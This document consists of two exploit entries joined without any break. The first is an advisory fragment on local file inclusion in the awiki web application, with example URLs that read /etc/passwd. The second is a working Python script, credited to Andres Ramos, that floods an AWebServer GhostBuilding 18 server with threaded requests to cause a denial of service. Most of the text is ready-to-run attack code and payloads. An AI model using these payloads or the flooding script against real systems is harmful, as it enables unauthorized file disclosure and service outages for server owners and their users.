An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

awiki 20100125 is vulnerable; other versions may also be affected. 

http://www.example.com/awiki/index.php?page=/etc/passwd
http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd 
            
# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)
# Date: 28/12/2021
# Exploit Author: Andres Ramos [Invertebrado]
# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm
# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en
# Version: AWebServer GhostBuilding 18
# Tested on: Android

#!/usr/bin/python3

# *********************************************************************************
# * 	               	 Author: Andres Ramos [Invertebrado]                      *
# *  AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash  *
# *********************************************************************************

import signal
import requests
from pwn import *

#Colors
class colors():
        GREEN = "\033[0;32m\033[1m"
        END = "\033[0m"
        RED = "\033[0;31m\033[1m"
        BLUE = "\033[0;34m\033[1m"
        YELLOW = "\033[0;33m\033[1m"
        PURPLE = "\033[0;35m\033[1m"
        TURQUOISE = "\033[0;36m\033[1m"
        GRAY = "\033[0;37m\033[1m"

exit = False

def def_handler(sig, frame):
	print(colors.RED + "\n[!] Exiting..." + colors.END)
	exit = True
	sys.exit(0)

	if threading.activeCount() > 1:
		os.system("tput cnorm")
		os._exit(getattr(os, "_exitcode", 0))
	else:
		os.system("tput cnorm")
		sys.exit(getattr(os, "_exitcode", 0))

signal.signal(signal.SIGINT, def_handler)

if len(sys.argv) < 3:
	print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)
	sys.exit(1)

url = sys.argv[1]
Tr = sys.argv[2]

def http():
	counter = 0
	p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)
	while True:
		r = requests.get(url)
		r = requests.get(url + "/mysqladmin")
		counter += 2
		p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)

		if exit:
			break

if __name__ == '__main__':

	threads = []

	try:
		for i in range(0, int(Tr)):
			t = threading.Thread(target=http)
			threads.append(t)

			sys.stderr = open("/dev/null", "w")

		for x in threads:
			x.start()

		for x in threads:
			x.join()

	except Exception as e:
		log.failure(str(e))
		sys.exit(1)